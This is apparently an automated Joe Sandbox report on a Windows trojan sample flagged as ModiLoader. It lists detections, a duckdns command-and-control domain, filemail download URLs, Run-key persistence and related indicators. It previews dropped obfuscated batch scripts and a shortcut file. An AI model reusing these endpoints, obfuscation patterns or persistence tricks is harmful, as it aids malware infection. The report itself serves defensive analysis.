              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              MeP66xi1AM.exe53%ReversingLabsWin32.Trojan.ModiLoader
              MeP66xi1AM.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\Wnbcdrjt.PIF100%Joe Sandbox ML
              C:\Users\Public\Libraries\Wnbcdrjt.PIF53%ReversingLabsWin32.Trojan.ModiLoader

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://1010.filemail.com/Ff0%Avira URL Cloudsafe
              https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c3260%Avira URL Cloudsafe
              https://1010.filemail.com:443/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodR0%Avira URL Cloudsafe
              https://1010.filemail.com/api/fi0%Avira URL Cloudsafe
              https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZP0%Avira URL Cloudsafe
              http://www.pmail.com00%Avira URL Cloudsafe
              http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
              hafiznor3374.duckdns.org100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              hafiznor3374.duckdns.org
              		192.169.69.26
              		truetrue
                		unknown
                ip.1010.filemail.com
                		23.237.50.106
                		truefalse
                  		unknown
                  1010.filemail.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326true
                    • Avira URL Cloud: safe
                    		unknown
                    hafiznor3374.duckdns.orgtrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://geoplugin.net/json.gpcolorcpl.exefalse
                        		high
                        https://1010.filemail.com:443/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRMeP66xi1AM.exe, 00000000.00000002.2192520767.000000000083F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://sectigo.com/CPS0MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPMeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://ocsp.sectigo.com0MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://geoplugin.net/json.gp/Ccolorcpl.exe, 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                https://1010.filemail.com/api/fiMeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A7D000.00000004.00001000.00020000.00000000.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://1010.filemail.com/FfMeP66xi1AM.exe, 00000000.00000002.2192520767.00000000007CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ocsp.sectigo.com0CMeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.pmail.com0MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    192.169.69.26
                                    		hafiznor3374.duckdns.orgUnited States
                                    		23033WOWUStrue
                                    23.237.50.106
                                    		ip.1010.filemail.comUnited States
                                    		174COGENT-174USfalse

                                    Private

                                    IP
                                    127.0.0.1

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1576964
                                    Start date and time:2024-12-17 19:46:07 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 22s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:MeP66xi1AM.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:b9803b83ed42e8f63e73719cfffeff30ecfabeca676a3a04a087754e2608a1c5.exe
                                    Detection:MAL
                                    Classification:mal100.rans.troj.spyw.evad.winEXE@14/6@5/3
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 80
                                    • Number of non-executed functions: 230
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212, 4.175.87.197
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: MeP66xi1AM.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    13:46:59API Interceptor2x Sleep call for process: MeP66xi1AM.exe modified
                                    13:47:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wnbcdrjt C:\Users\Public\Wnbcdrjt.url
                                    13:47:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wnbcdrjt C:\Users\Public\Wnbcdrjt.url
                                    13:47:18API Interceptor2x Sleep call for process: Wnbcdrjt.PIF modified
                                    13:47:43API Interceptor5044056x Sleep call for process: colorcpl.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    192.169.69.26f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                    • duclog23.duckdns.org:37552/
                                    SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                    • yuya0415.duckdns.org:1928/Vre
                                    confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                    • servidorarquivos.duckdns.org/e/e
                                    oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                    • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                    oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                    • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                    http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                    • yvtplhuqem.duckdns.org/ja/
                                    http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                    • fqqqffcydg.duckdns.org/en/
                                    http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                    • yugdzvsqnf.duckdns.org/en/
                                    &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                    • servidorarquivos.duckdns.org/e/e
                                    transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                    • servidorarquivos.duckdns.org/e/e
                                    23.237.50.106https://www.filemail.com/t/cFCAI9C4Get hashmaliciousHtmlDropperBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ip.1010.filemail.comhttps://www.filemail.com/t/cFCAI9C4Get hashmaliciousHtmlDropperBrowse
                                      • 23.237.50.106

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WOWUSgreatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                      • 192.169.69.26
                                      RFQ_#24429725,pdf.exeGet hashmaliciousAsyncRATBrowse
                                      • 192.169.69.26
                                      hesaphareketi-01.pdf.exeGet hashmaliciousAsyncRATBrowse
                                      • 192.169.69.26
                                      seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                      • 192.169.69.26
                                      sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                      • 192.169.69.26
                                      1734388385543fca13ccf5614dc71c1922a5cd8cddeb80fc9e4bce55f618d2232c3744cd06117.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 192.169.69.26
                                      x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                      • 192.169.69.26
                                      zvXPSu3dK5.exeGet hashmaliciousAsyncRATBrowse
                                      • 192.169.69.26
                                      173398584769f9c5bcf28a71f77fba1335e77fe6b4cc4f05afc05fdd9f5830429be0bc9fb5758.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                      • 192.169.69.26
                                      nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                      • 192.169.69.26
                                      COGENT-174UShttps://6movies.stream/series/cobra-kai-80711/6-4/Get hashmaliciousUnknownBrowse
                                      • 50.7.236.66
                                      http://85off-lv.comGet hashmaliciousUnknownBrowse
                                      • 38.177.146.78
                                      GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                      • 154.23.182.10
                                      236236236.elfGet hashmaliciousUnknownBrowse
                                      • 154.23.5.217
                                      i686.elfGet hashmaliciousMiraiBrowse
                                      • 38.180.143.40
                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                      • 38.88.3.212
                                      i486.elfGet hashmaliciousMiraiBrowse
                                      • 154.31.65.187
                                      mips.elfGet hashmaliciousMiraiBrowse
                                      • 38.180.143.40
                                      armv5l.elfGet hashmaliciousMiraiBrowse
                                      • 38.180.143.40
                                      armv7l.elfGet hashmaliciousMiraiBrowse
                                      • 38.180.143.40

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      a0e9f5d64349fb13191bc781f81f42e1CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                      • 23.237.50.106
                                      CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                      • 23.237.50.106
                                      lavita.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                      • 23.237.50.106
                                      sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                      • 23.237.50.106
                                      66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                      • 23.237.50.106
                                      out.bin.exeGet hashmaliciousLummaCBrowse
                                      • 23.237.50.106
                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                      • 23.237.50.106
                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                      • 23.237.50.106
                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                      • 23.237.50.106
                                      jYd7FUgGZc.exeGet hashmaliciousLummaC, StealcBrowse
                                      • 23.237.50.106

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\Public\Libraries\FX.cmd

                                      Download File
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8556
                                      Entropy (8bit):4.623706637784657
                                      Encrypted:false
                                      SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                      MD5:60CD0BE570DECD49E4798554639A05AE
                                      SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                      SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                      SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                      Malicious:true
                                      Reputation:low
                                      Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%

                                      C:\Users\Public\Libraries\NEO.cmd

                                      Download File
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):46543
                                      Entropy (8bit):4.705001079878445
                                      Encrypted:false
                                      SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                      MD5:637A66953F03B084808934ED7DF7192F
                                      SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                      SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                      SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                      Malicious:false
                                      Reputation:low
                                      Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .

                                      C:\Users\Public\Libraries\Wnbcdrjt

                                      Download File
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):811525
                                      Entropy (8bit):7.5927403967098615
                                      Encrypted:false
                                      SSDEEP:12288:TyHmkj2HDDmuHWqPmcGlkstY3iJ6CQbq2H7WSq8IMn0h8OYRBl3VjUcSxxi1nHW8:0mI2HXUqPmcjspQJH080fYXvjUtxs1nZ
                                      MD5:64DFA7CDDE27CCEDA300AB081CF06234
                                      SHA1:866575CB500CE84CE317AE9D7E23A24A85728E10
                                      SHA-256:55190F72FAD2778CF0C2D766B523377938D5EF290D007F37F037DE8AB9273E08
                                      SHA-512:908272FDD102BE05D42E1CE76FA5DA318379A7E179642CD3E361F2A8A128B78A79D67F688D8BFABD63195F6AF8152AD5C3C87429A29F0DE49066E2CE3C0EB0D6
                                      Malicious:true
                                      Reputation:low
                                      Preview:...Y#..K.....$.%&...........%&&%$#&....%...%#... !...%$..$.....#.'....%.&"!...%.....Y#..K.......!..%...Y#..K..........................................................................................................................................................................................................................................................................................................................................................................................................................................................@...7.[.1...A.....................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\Public\Libraries\Wnbcdrjt.PIF

                                      Download File
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):952320
                                      Entropy (8bit):7.0393696567543405
                                      Encrypted:false
                                      SSDEEP:24576:R7sP5Kw0G1OAc8msbN0o2IDGHfPMFQJQI/zN:R8o9G1bTcfPMFQJQI/zN
                                      MD5:F8CDBDF8318C11C2E3E286195F067042
                                      SHA1:AF9C826E25D7D9242C5957CF753AF46DCB45FD33
                                      SHA-256:B9803B83ED42E8F63E73719CFFFEFF30ECFABECA676A3A04A087754E2608A1C5
                                      SHA-512:CF30201667EBB76ABB9ADBED69AFC2112385B6581449C496014A4C33328E7243531E13403384B3A9894BE60C4029FA5DE5A49133EA7465FC8E034B0C8CD3B74E
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF, Author: Joe Security
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 53%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................f.......7.......@....@..............................................@..............................x&...`...........................m..................................................@................................text...(........................... ..`.itext.......0...................... ..`.data........@......."..............@....bss....t8...`.......@...................idata..x&.......(...@..............@....tls....4............h...................rdata...............h..............@..@.reloc...m.......n...j..............@..B.rsrc........`......................@..@....................................@..@................................................................................................

                                      C:\Users\Public\Wnbcdrjt.url

                                      Download File
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wnbcdrjt.PIF">), ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):104
                                      Entropy (8bit):5.130245247505056
                                      Encrypted:false
                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM5vLeysbxLYXA6ov:HRYFVmTWDyzcfEx/6y
                                      MD5:93915DBEB73B30A06B6523F7DCAA9F54
                                      SHA1:6167009939F298EA606557A9CDC8399A5CDD7B00
                                      SHA-256:5CC1D065043546917E1DB235511B3AA0DD26AF10B986F666A35430FDC81DFD1E
                                      SHA-512:A716724E7E818B5465992CA49DC95347D4EB32F8D9DC1C5B3768D245A08B9621443F0E815B1AD22E5965B692205B76BD4F5FCA6194F9F485F503F8918BFE4306
                                      Malicious:true
                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wnbcdrjt.PIF"..IconIndex=917626..HotKey=83..

                                      C:\Users\Public\WnbcdrjtF.cmd

                                      Download File
                                      Process:C:\Users\user\Desktop\MeP66xi1AM.exe
                                      File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):15789
                                      Entropy (8bit):4.658965888116939
                                      Encrypted:false
                                      SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                      MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                      SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                      SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                      SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                      Malicious:false
